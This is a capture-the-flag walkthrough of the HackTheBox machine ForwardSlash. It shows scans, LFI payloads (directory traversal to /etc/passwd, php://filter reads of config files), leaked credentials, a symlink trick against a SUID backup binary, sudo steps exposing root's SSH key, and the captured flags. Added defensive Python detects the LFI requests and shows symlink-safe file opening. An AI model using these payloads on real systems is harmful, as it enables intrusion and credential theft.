NMAP SCANS
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-02 10:20 IST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 10:20
Completed NSE at 10:20, 0.00s elapsed
Initiating NSE at 10:20
Completed NSE at 10:20, 0.00s elapsed
Initiating NSE at 10:20
Completed NSE at 10:20, 0.00s elapsed
Initiating Ping Scan at 10:20
Scanning 10.10.10.183 [4 ports]
Completed Ping Scan at 10:20, 1.04s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 10:20
Scanning forwardslash.htb (10.10.10.183) [1000 ports]
Discovered open port 80/tcp on 10.10.10.183
Discovered open port 22/tcp on 10.10.10.183
Completed SYN Stealth Scan at 10:20, 4.20s elapsed (1000 total ports)
Initiating Service scan at 10:20
Scanning 2 services on forwardslash.htb (10.10.10.183)
Completed Service scan at 10:20, 6.66s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against forwardslash.htb (10.10.10.183)
Retrying OS detection (try #2) against forwardslash.htb (10.10.10.183)
Retrying OS detection (try #3) against forwardslash.htb (10.10.10.183)
Retrying OS detection (try #4) against forwardslash.htb (10.10.10.183)
Retrying OS detection (try #5) against forwardslash.htb (10.10.10.183)
Initiating Traceroute at 10:20
Completed Traceroute at 10:20, 0.38s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 10:20
Completed Parallel DNS resolution of 2 hosts. at 10:20, 0.34s elapsed
NSE: Script scanning 10.10.10.183.
Initiating NSE at 10:20
Completed NSE at 10:20, 12.12s elapsed
Initiating NSE at 10:20
Completed NSE at 10:20, 2.25s elapsed
Initiating NSE at 10:20
Completed NSE at 10:20, 0.00s elapsed
Nmap scan report for forwardslash.htb (10.10.10.183)
Host is up (0.22s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 3c:3b:eb:54:96:81:1d:da:d7:96:c7:0f:b4:7e:e1:cf (RSA)
| 256 f6:b3:5f:a2:59:e3:1e:57:35:36:c3:fe:5e:3d:1f:66 (ECDSA)
|_ 256 1b:de:b8:07:35:e8:18:2c:19:d8:cc:dd:77:9c:f2:5e (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Backslash Gang
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=6/2%OT=22%CT=1%CU=40458%PV=Y%DS=2%DC=T%G=Y%TM=5ED5DAB3
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=108%TI=Z%CI=Z%II=I%TS=A)OPS(
OS:O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST11
OS:NW7%O6=M54DST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(
OS:R=Y%DF=Y%T=40%W=FAF0%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS
OS:%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=
OS:Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=
OS:R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T
OS:=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=
OS:S)
Uptime guess: 39.164 days (since Fri Apr 24 06:25:14 2020)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 199/tcp)
HOP RTT ADDRESS
1 378.15 ms 10.10.14.1
2 378.15 ms forwardslash.htb (10.10.10.183)
NSE: Script Post-scanning.
Initiating NSE at 10:20
Completed NSE at 10:20, 0.00s elapsed
Initiating NSE at 10:20
Completed NSE at 10:20, 0.00s elapsed
Initiating NSE at 10:20
Completed NSE at 10:20, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 47.82 seconds
Raw packets sent: 1193 (56.566KB) | Rcvd: 1151 (49.594KB)
PORT 80 ENUMERATION

The site itself has nothing interesting, so let's fuzz this directory.
We got a file named note.txt.

After reading that note, I assume there is a backup site which we can access.
So I tried backupsite.htb, backup.htb and many more, and got one working: backup.forwardslash.htb. I added this to the hosts file and accessed it.

I fuzzed the URL and got some pages and a directory here!
root@liquid:~/Desktop/HTB/forwardslash# gobuster dir -u http://backup.forwardslash.htb/ -w /usr/share/wordlists/wfuzz/general/big.txt -x php,txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://backup.forwardslash.htb/
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/wfuzz/general/big.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php,txt
[+] Timeout: 10s
===============================================================
2020/06/02 11:30:44 Starting gobuster
===============================================================
/config.php (Status: 200)
/dev (Status: 301)
/index.php (Status: 302)
/logout.php (Status: 302)
/login.php (Status: 200)
Progress: 2184 / 3025 (72.20%)^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2020/06/02 11:35:00 Finished
===============================================================
It has a login page, so I signed up and went on to enumerate more.
I went through every page but found nothing, except that there is a page called Change Profile Picture.
There was a link bar where we can input any URL, so I enabled it. Then, as usual, I tried ../../../../../../etc/passwd

It worked as an LFI.
So I first tried to get the files we found above during fuzzing, because we cannot read their PHP source directly by requesting them.
I found interesting things in both files.
Payloads to access those files:
php://filter/convert.base64-encode/resource=/dev/index.php
php://filter/convert.base64-encode/resource=config.php
config.php

<?php
//credentials for the temp db while we recover, had to backup old config, didn't want it getting compromised -pain
define('DB_SERVER', 'localhost');
define('DB_USERNAME', 'www-data');
define('DB_PASSWORD', '5iIwJX0C2nZiIhkLYE7n314VcKNx8uMkxfLvCTz2USGY180ocz3FQuVtdCy3dAgIMK3Y8XFZv9fBi6OwG6OYxoAVnhaQkm7r2ec');
define('DB_NAME', 'site');
/* Attempt to connect to MySQL database */
$link = mysqli_connect(DB_SERVER, DB_USERNAME, DB_PASSWORD, DB_NAME);
// Check connection
if($link === false){
    die("ERROR: Could not connect. " . mysqli_connect_error());
}
?>
/dev/index.php

<?php
if ($_SERVER['REQUEST_METHOD'] === "GET" && isset($_GET['xml'])) {
    // Pulls an ftp:// URL out of the user-supplied xml parameter; the host
    // that is connected to below therefore comes straight from the request.
    $reg = '/ftp:\/\/[\s\S]*\/\"/';
    //$reg = '/((((25[0-5])|(2[0-4]\d)|([01]?\d?\d)))\.){3}((((25[0-5])|(2[0-4]\d)|([01]?\d?\d))))/'
    if (preg_match($reg, $_GET['xml'], $match)) {
        $ip = explode('/', $match[0])[2];
        echo $ip;
        error_log("Connecting");
        $conn_id = ftp_connect($ip) or die("Couldn't connect to $ip\n");
        error_log("Logging in");
        // Hardcoded credentials: anyone able to read this file gets them.
        if (@ftp_login($conn_id, "chiv", 'N0bodyL1kesBack/')) {
            error_log("Getting file");
            echo ftp_get_string($conn_id, "debug.txt");
        }
        exit;
    }
}
chiv : N0bodyL1kesBack/
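From the defender's side, the traversal and php://filter requests above leave a clear trace in the web server's access log. The following is an added example (not part of the original post) that scans Apache combined-format lines for those two patterns, percent-decoding repeatedly so double-encoded variants are caught; the log lines and the endpoint name profilepicture.php are constructed.

```python
import re
from urllib.parse import unquote, urlsplit, parse_qsl

# Constructed Apache combined-format lines (not from the original post); the
# endpoint name is hypothetical, the last three mimic the requests described above.
SAMPLE_LOG = """\
10.10.14.63 - - [02/Jun/2020:11:40:01 +0000] "GET /index.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.10.14.63 - - [02/Jun/2020:11:40:09 +0000] "GET /profilepicture.php?url=https://example.test/a.png HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.10.14.63 - - [02/Jun/2020:11:41:30 +0000] "GET /profilepicture.php?url=../../../../../../etc/passwd HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.10.14.63 - - [02/Jun/2020:11:42:02 +0000] "GET /profilepicture.php?url=php%3A%2F%2Ffilter%2Fconvert.base64-encode%2Fresource%3Dconfig.php HTTP/1.1" 200 1300 "-" "Mozilla/5.0"
10.10.14.63 - - [02/Jun/2020:11:43:15 +0000] "GET /profilepicture.php?url=%252e%252e%2f%252e%252e%2fetc%2fpasswd HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
TRAVERSAL_RE = re.compile(r'\.\.[/\\]')    # ../ or ..\ once decoded
WRAPPER_RE = re.compile(r'\bphp://', re.I)  # php://filter, php://input, ...

def fully_decode(value, rounds=3):
    """Percent-decode until stable so double-encoded payloads are caught."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def scan_line(line):
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m["target"])
    # Check the decoded path and every decoded query value separately.
    candidates = [fully_decode(parts.path)]
    candidates += [fully_decode(v) for _, v in parse_qsl(parts.query, keep_blank_values=True)]
    reasons = set()
    for value in candidates:
        if TRAVERSAL_RE.search(value):
            reasons.add("path traversal")
        if WRAPPER_RE.search(value):
            reasons.add("php stream wrapper")
    if not reasons:
        return None
    return {"ip": m["ip"], "time": m["ts"], "status": m["status"],
            "target": m["target"], "reasons": sorted(reasons)}

def scan_log(text):
    """Scan a whole access log and return the findings in order."""
    return [f for f in map(scan_line, text.splitlines()) if f]
```

A 200 status on a flagged request, as in the constructed lines, is the signal worth alerting on: the file read succeeded rather than being rejected.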
Here we got a password for a user in the files, so let's try it.
SSH LOGIN
root@liquid:~/Desktop/HTB/forwardslash# ssh chiv@10.10.10.183
chiv@10.10.10.183's password:
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-91-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Tue Jun 2 07:43:48 UTC 2020
System load: 0.08 Processes: 196
Usage of /: 30.6% of 19.56GB Users logged in: 2
Memory usage: 18% IP address for ens33: 10.10.10.183
Swap usage: 0%
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
16 packages can be updated.
0 updates are security updates.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Tue Jun 2 06:17:58 2020 from 10.10.14.63
chiv@forwardslash:~$ id
uid=1001(chiv) gid=1001(chiv) groups=1001(chiv)
But we still don't have access to the user flag, so for that we need to get into pain's account.
Let's enumerate more. We found some backup things going on:
a backup binary with SUID
config.php.bak readable only by pain
After looking at those, I came to know that we need to deal with the md5sum/timestamp part,
and I am not familiar with that, so I asked my friend to help me out.
He gave me the idea to make a bash script to get this working!
Here it is:
#!/bin/bash
# First run: backup prints an ERROR line naming the file it expects to find.
i=$(backup | grep ERROR | awk '{print $2}')
# Create a symlink with that name pointing at pain's config.php.bak.
ln -s /var/backups/config.php.bak /home/chiv/"$i"
# Second run: backup now reads through the link and prints the contents.
/usr/bin/backup
I created this with his help!
Here we got the password of pain!
pain : db1f73a72678e857d91e71d2963a1afa9efbabb32164cc1d94dbc704
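The script above works because a privileged program opened a file at a predictable name in a user-writable directory and followed whatever that name pointed at. As an added example (not from the original post or the box), this Python shows how such a program should open that file: O_NOFOLLOW so a planted symlink is rejected, plus an fstat check on the descriptor actually opened; the directory layout and file names are constructed.

```python
import os
import stat
import tempfile

def open_expected_file(directory, name):
    """Open <directory>/<name> the way a privileged backup job should: refuse path
    components in the name, refuse a symlink as the final component, and refuse
    anything that is not a regular file owned by the effective user."""
    if os.sep in name or name in ("", ".", ".."):
        raise ValueError("unexpected file name: %r" % name)
    dir_fd = os.open(directory, os.O_RDONLY | os.O_DIRECTORY)
    try:
        # O_NOFOLLOW makes open() fail with ELOOP when the final component
        # is a symlink, so a planted link is rejected instead of followed.
        fd = os.open(name, os.O_RDONLY | os.O_NOFOLLOW | os.O_CLOEXEC, dir_fd=dir_fd)
    finally:
        os.close(dir_fd)
    st = os.fstat(fd)  # inspect the file actually opened, not the path
    if not stat.S_ISREG(st.st_mode) or st.st_uid != os.geteuid():
        os.close(fd)
        raise PermissionError("not a regular file owned by the caller")
    return fd

def demo():
    """Constructed scenario (not the box's layout): a legitimate file and a
    symlink planted under another expected name, both in one directory.
    Returns (legit_read_ok, symlink_refused, traversal_name_refused)."""
    with tempfile.TemporaryDirectory() as work:
        secret = os.path.join(work, "config.php.bak")
        with open(secret, "w") as f:
            f.write("define('DB_PASSWORD', 'placeholder');\n")
        with open(os.path.join(work, "expected"), "w") as f:
            f.write("backup data\n")
        os.symlink(secret, os.path.join(work, "planted"))
        fd = open_expected_file(work, "expected")
        legit_ok = os.read(fd, 64) == b"backup data\n"
        os.close(fd)
        try:
            open_expected_file(work, "planted")
            symlink_refused = False
        except OSError:
            symlink_refused = True
        try:
            open_expected_file(work, "../etc/passwd")
            traversal_refused = False
        except ValueError:
            traversal_refused = True
    return legit_ok, symlink_refused, traversal_refused
```

The ownership check alone would not have helped here, since the symlink target was already pain's file; it is the refusal to follow links that closes the gap.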
Let's grab user.txt
pain@forwardslash:~$ cat user.txt
59f0c1034a3074b6bc6d87316a118810
GETTING ROOT ACCESS
pain@forwardslash:~/encryptorinator$ sudo -l
Matching Defaults entries for pain on forwardslash:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User pain may run the following commands on forwardslash:
(root) NOPASSWD: /sbin/cryptsetup luksOpen *
(root) NOPASSWD: /bin/mount /dev/mapper/backup ./mnt/
(root) NOPASSWD: /bin/umount ./mnt/
This was difficult for me because I don't know crypto scripts, so again I took help and got the password.
I am actually waiting for IppSec's video to understand this part.
So I ran the commands to decrypt the image and get the decrypted part as the backup device, which we cannot directly access as it is owned by root, but we can mount it as mount has SUID.
After running these commands I got output like this:
pain@forwardslash:~/encryptorinator$ sudo /sbin/cryptsetup luksOpen /var/backups/recovery/encrypted_backup.img backup
Enter passphrase for /var/backups/recovery/encrypted_backup.img:
pain@forwardslash:~/encryptorinator$ sudo /bin/mount /dev/mapper/backup ./mnt/
mount: ./mnt/: mount point does not exist.
pain@forwardslash:~/encryptorinator$ mkdir mnt
pain@forwardslash:~/encryptorinator$ sudo /bin/mount /dev/mapper/backup ./mnt/
pain@forwardslash:~/encryptorinator$ cd mnt/
pain@forwardslash:~/encryptorinator/mnt$ ls
id_rsa
pain@forwardslash:~/encryptorinator/mnt$ cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
Here we go with the root id_rsa.
root@liquid:~/Desktop/HTB/forwardslash# vi id_rsaroot
root@liquid:~/Desktop/HTB/forwardslash# chmod 600 id_rsaroot
root@liquid:~/Desktop/HTB/forwardslash# ssh -i id_rsaroot 10.10.10.183
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-91-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Tue Jun 2 06:55:21 UTC 2020
System load: 0.05 Processes: 190
Usage of /: 30.6% of 19.56GB Users logged in: 1
Memory usage: 18% IP address for ens33: 10.10.10.183
Swap usage: 0%
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
16 packages can be updated.
0 updates are security updates.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Tue Mar 24 12:11:46 2020 from 10.10.14.3
root@forwardslash:~# ls
root.txt
root@forwardslash:~# cat root.txt
e78febc4934fdb81bb3b6fe14ca9dedd
So here we are, done with this machine!
I learnt a lot of things from this machine.
Yes, it was difficult for me, as the crypto part took me the longest.
But I covered the whole of it.
Still, crypto is difficult for me and I need to learn more about it.
HOPE YOU LOVE THIS WALKTHROUGH BY LIQUIDRAGE